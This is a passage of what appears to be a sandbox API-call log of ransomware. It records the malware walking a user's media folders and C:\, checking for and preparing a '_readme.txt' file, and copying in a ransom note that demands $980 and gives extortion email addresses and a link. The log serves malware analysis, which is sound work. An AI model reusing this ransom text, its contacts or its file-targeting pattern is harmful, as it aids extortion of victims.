cAlternateFileName="MDTM58~1.MP3")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4518220, ftCreationTime.dwHighDateTime=0x1d5bc6f, ftLastAccessTime.dwLowDateTime=0x5cbd7ae0, ftLastAccessTime.dwHighDateTime=0x1d5c2d2, ftLastWriteTime.dwLowDateTime=0x5cbd7ae0, ftLastWriteTime.dwHighDateTime=0x1d5c2d2, nFileSizeHigh=0x0, nFileSizeLow=0x156d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MogmZJ mi.wav", cAlternateFileName="MOGMZJ~1.WAV")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60c4ee10, ftCreationTime.dwHighDateTime=0x1d5bd5b, ftLastAccessTime.dwLowDateTime=0x9f53dc90, ftLastAccessTime.dwHighDateTime=0x1d5c3c3, ftLastWriteTime.dwLowDateTime=0x9f53dc90, ftLastWriteTime.dwHighDateTime=0x1d5c3c3, nFileSizeHigh=0x0, nFileSizeLow=0x162ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="owB8mF5PoRyx.mp3", cAlternateFileName="OWB8MF~1.MP3")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96393800, ftCreationTime.dwHighDateTime=0x1d5b6f6, ftLastAccessTime.dwLowDateTime=0x67bd0180, ftLastAccessTime.dwHighDateTime=0x1d5be87, ftLastWriteTime.dwLowDateTime=0x67bd0180, ftLastWriteTime.dwHighDateTime=0x1d5be87, nFileSizeHigh=0x0, nFileSizeLow=0xe6f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru8sq236NGxYT5cO8z.m4a", cAlternateFileName="RU8SQ2~1.M4A")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a6d850, ftCreationTime.dwHighDateTime=0x1d5c0af, ftLastAccessTime.dwLowDateTime=0xa55eb390, ftLastAccessTime.dwHighDateTime=0x1d5c03e, ftLastWriteTime.dwLowDateTime=0xa55eb390, ftLastWriteTime.dwHighDateTime=0x1d5c03e, nFileSizeHigh=0x0, nFileSizeLow=0xa57f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UMoLnftPiMHJ35Im.mp3", cAlternateFileName="UMOLNF~1.MP3")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b7ade70, ftCreationTime.dwHighDateTime=0x1d5b5d6, ftLastAccessTime.dwLowDateTime=0x27b818a0, ftLastAccessTime.dwHighDateTime=0x1d5c403, ftLastWriteTime.dwLowDateTime=0x27b818a0, ftLastWriteTime.dwHighDateTime=0x1d5c403, nFileSizeHigh=0x0, nFileSizeLow=0x17f5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v4b8mFeC7.wav", cAlternateFileName="V4B8MF~1.WAV")) returned 1 [0228.818] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2839b600, ftCreationTime.dwHighDateTime=0x1d5b821, ftLastAccessTime.dwLowDateTime=0x5527b230, ftLastAccessTime.dwHighDateTime=0x1d5c135, ftLastWriteTime.dwLowDateTime=0x5527b230, ftLastWriteTime.dwHighDateTime=0x1d5c135, nFileSizeHigh=0x0, nFileSizeLow=0xc0cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x-wSlrFQzI.mp3", cAlternateFileName="X-WSLR~1.MP3")) returned 1 [0228.819] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c2df10, ftCreationTime.dwHighDateTime=0x1d5b716, ftLastAccessTime.dwLowDateTime=0xe652a7f0, ftLastAccessTime.dwHighDateTime=0x1d5c0c3, ftLastWriteTime.dwLowDateTime=0xe652a7f0, ftLastWriteTime.dwHighDateTime=0x1d5c0c3, nFileSizeHigh=0x0, nFileSizeLow=0x1fe0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xb2T7DyZrvwJdpa.m4a", cAlternateFileName="XB2T7D~1.M4A")) returned 1 [0228.819] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x454f540, ftCreationTime.dwHighDateTime=0x1d5be77, ftLastAccessTime.dwLowDateTime=0x63809380, ftLastAccessTime.dwHighDateTime=0x1d5b9a9, ftLastWriteTime.dwLowDateTime=0x63809380, ftLastWriteTime.dwHighDateTime=0x1d5b9a9, nFileSizeHigh=0x0, nFileSizeLow=0x5d22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Sp4lIgrh-.mp3", cAlternateFileName="_3SP4L~1.MP3")) returned 1 [0228.819] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x454f540, ftCreationTime.dwHighDateTime=0x1d5be77, ftLastAccessTime.dwLowDateTime=0x63809380, ftLastAccessTime.dwHighDateTime=0x1d5b9a9, ftLastWriteTime.dwLowDateTime=0x63809380, ftLastWriteTime.dwHighDateTime=0x1d5b9a9, nFileSizeHigh=0x0, nFileSizeLow=0x5d22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_3Sp4lIgrh-.mp3", cAlternateFileName="_3SP4L~1.MP3")) returned 0 [0228.819] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.819] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.819] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\") returned="2DVGfW2 wBKbSvaIoJ2e\\" [0228.819] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0228.820] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.820] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.820] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.820] PathFindFileNameW (pszPath="") returned="" [0228.820] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeab9eb60, ftCreationTime.dwHighDateTime=0x1d5c531, ftLastAccessTime.dwLowDateTime=0x38ed7b0, ftLastAccessTime.dwHighDateTime=0x1d5c46d, ftLastWriteTime.dwLowDateTime=0x38ed7b0, ftLastWriteTime.dwHighDateTime=0x1d5c46d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.824] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeab9eb60, ftCreationTime.dwHighDateTime=0x1d5c531, ftLastAccessTime.dwLowDateTime=0x38ed7b0, ftLastAccessTime.dwHighDateTime=0x1d5c46d, ftLastWriteTime.dwLowDateTime=0x38ed7b0, ftLastWriteTime.dwHighDateTime=0x1d5c46d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.824] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaff72640, ftCreationTime.dwHighDateTime=0x1d5b759, ftLastAccessTime.dwLowDateTime=0xc509e60, ftLastAccessTime.dwHighDateTime=0x1d5c477, ftLastWriteTime.dwLowDateTime=0xc509e60, ftLastWriteTime.dwHighDateTime=0x1d5c477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lEiN6S__d", cAlternateFileName="LEIN6S~1")) returned 1 [0228.824] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb051cb30, ftCreationTime.dwHighDateTime=0x1d5c353, ftLastAccessTime.dwLowDateTime=0x5d2c2d60, ftLastAccessTime.dwHighDateTime=0x1d5bade, ftLastWriteTime.dwLowDateTime=0x5d2c2d60, ftLastWriteTime.dwHighDateTime=0x1d5bade, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lvw4jN8h", cAlternateFileName="")) returned 1 [0228.824] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37d03500, ftCreationTime.dwHighDateTime=0x1d5c2ec, ftLastAccessTime.dwLowDateTime=0x98a7f9a0, ftLastAccessTime.dwHighDateTime=0x1d5b6ec, ftLastWriteTime.dwLowDateTime=0x98a7f9a0, ftLastWriteTime.dwHighDateTime=0x1d5b6ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OHXi", cAlternateFileName="")) returned 1 [0228.824] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89ca64d0, ftCreationTime.dwHighDateTime=0x1d5c1e2, ftLastAccessTime.dwLowDateTime=0x7982f250, ftLastAccessTime.dwHighDateTime=0x1d5c2bd, ftLastWriteTime.dwLowDateTime=0x7982f250, ftLastWriteTime.dwHighDateTime=0x1d5c2bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rJ-XhzoDCCMB9", cAlternateFileName="RJ-XHZ~1")) returned 1 [0228.824] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89ca64d0, ftCreationTime.dwHighDateTime=0x1d5c1e2, ftLastAccessTime.dwLowDateTime=0x7982f250, ftLastAccessTime.dwHighDateTime=0x1d5c2bd, ftLastWriteTime.dwLowDateTime=0x7982f250, ftLastWriteTime.dwHighDateTime=0x1d5c2bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rJ-XhzoDCCMB9", cAlternateFileName="RJ-XHZ~1")) returned 0 [0228.824] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.825] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.825] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\") returned="lVTDtn H8OPDt\\" [0228.825] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0228.825] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.825] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.825] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.825] PathFindFileNameW (pszPath="") returned="" [0228.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88ef9110, ftCreationTime.dwHighDateTime=0x1d5c125, ftLastAccessTime.dwLowDateTime=0xcb9a5d30, ftLastAccessTime.dwHighDateTime=0x1d5c41b, ftLastWriteTime.dwLowDateTime=0xcb9a5d30, ftLastWriteTime.dwHighDateTime=0x1d5c41b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.827] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88ef9110, ftCreationTime.dwHighDateTime=0x1d5c125, ftLastAccessTime.dwLowDateTime=0xcb9a5d30, ftLastAccessTime.dwHighDateTime=0x1d5c41b, ftLastWriteTime.dwLowDateTime=0xcb9a5d30, ftLastWriteTime.dwHighDateTime=0x1d5c41b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.827] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13165b80, ftCreationTime.dwHighDateTime=0x1d5bcc1, ftLastAccessTime.dwLowDateTime=0x41f015c0, ftLastAccessTime.dwHighDateTime=0x1d5c12d, ftLastWriteTime.dwLowDateTime=0x41f015c0, ftLastWriteTime.dwHighDateTime=0x1d5c12d, nFileSizeHigh=0x0, nFileSizeLow=0x5c48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gsPNvpvKbP2BeG.gif", cAlternateFileName="GSPNVP~1.GIF")) returned 1 [0228.828] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62254cc0, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x1b44c6c0, ftLastAccessTime.dwHighDateTime=0x1d5b834, ftLastWriteTime.dwLowDateTime=0x1b44c6c0, ftLastWriteTime.dwHighDateTime=0x1d5b834, nFileSizeHigh=0x0, nFileSizeLow=0xbfa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NKsY6vRRu.jpg", cAlternateFileName="NKSY6V~1.JPG")) returned 1 [0228.828] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a06fd20, ftCreationTime.dwHighDateTime=0x1d5c2e9, ftLastAccessTime.dwLowDateTime=0xcd538fd0, ftLastAccessTime.dwHighDateTime=0x1d5bcd1, ftLastWriteTime.dwLowDateTime=0xcd538fd0, ftLastWriteTime.dwHighDateTime=0x1d5bcd1, nFileSizeHigh=0x0, nFileSizeLow=0x2976, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r7Uo8kBmz.png", cAlternateFileName="R7UO8K~1.PNG")) returned 1 [0228.828] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64a7f70, ftCreationTime.dwHighDateTime=0x1d5bbe6, ftLastAccessTime.dwLowDateTime=0xcf79f80, ftLastAccessTime.dwHighDateTime=0x1d5ba81, ftLastWriteTime.dwLowDateTime=0xcf79f80, ftLastWriteTime.dwHighDateTime=0x1d5ba81, nFileSizeHigh=0x0, nFileSizeLow=0x1628b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vJNrdmrANWfXlDJT.png", cAlternateFileName="VJNRDM~1.PNG")) returned 1 [0228.828] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.829] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\") returned="NkpM1m8S\\" [0228.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0228.829] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.829] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.829] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.829] PathFindFileNameW (pszPath="") returned="" [0228.829] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5649ad30, ftCreationTime.dwHighDateTime=0x1d5bfe6, ftLastAccessTime.dwLowDateTime=0xe7e45550, ftLastAccessTime.dwHighDateTime=0x1d5c190, ftLastWriteTime.dwLowDateTime=0xe7e45550, ftLastWriteTime.dwHighDateTime=0x1d5c190, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.831] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.832] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.832] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0228.832] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0228.832] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.832] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.832] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.832] PathFindFileNameW (pszPath="") returned="" [0228.832] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe5ceb1d0, ftCreationTime.dwHighDateTime=0x1d5b9e7, ftLastAccessTime.dwLowDateTime=0x342d30a0, ftLastAccessTime.dwHighDateTime=0x1d5b5e6, ftLastWriteTime.dwLowDateTime=0x342d30a0, ftLastWriteTime.dwHighDateTime=0x1d5b5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.834] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.835] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.835] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\") returned="imXqHXuq\\" [0228.835] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0228.835] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.835] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.835] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.835] PathFindFileNameW (pszPath="") returned="" [0228.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\imXqHXuq\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x296de6d0, ftCreationTime.dwHighDateTime=0x1d5c051, ftLastAccessTime.dwLowDateTime=0x6a5d2120, ftLastAccessTime.dwHighDateTime=0x1d5b61e, ftLastWriteTime.dwLowDateTime=0x6a5d2120, ftLastWriteTime.dwHighDateTime=0x1d5b61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.837] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.838] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\") returned="kYk5K01VVlQpw\\" [0228.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0228.838] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.838] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.838] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.838] PathFindFileNameW (pszPath="") returned="" [0228.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kYk5K01VVlQpw\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f47cb60, ftCreationTime.dwHighDateTime=0x1d5c19d, ftLastAccessTime.dwLowDateTime=0x5bb6a8f0, ftLastAccessTime.dwHighDateTime=0x1d5b63f, ftLastWriteTime.dwLowDateTime=0x5bb6a8f0, ftLastWriteTime.dwHighDateTime=0x1d5b63f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.840] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.841] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.841] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.841] PathFindFileNameW (pszPath="") returned="" [0228.841] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.842] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.842] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.842] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.842] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0228.842] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0228.842] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x33f03c8 [0228.842] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0228.842] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0228.842] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.844] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0228.844] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0228.844] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0228.844] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.844] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.844] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0228.844] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.844] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.844] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.844] PathFindFileNameW (pszPath="") returned="" [0228.844] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.845] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.845] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.845] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.845] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0228.845] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0228.845] lstrcpyW (in: lpString1=0x3b7c818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of 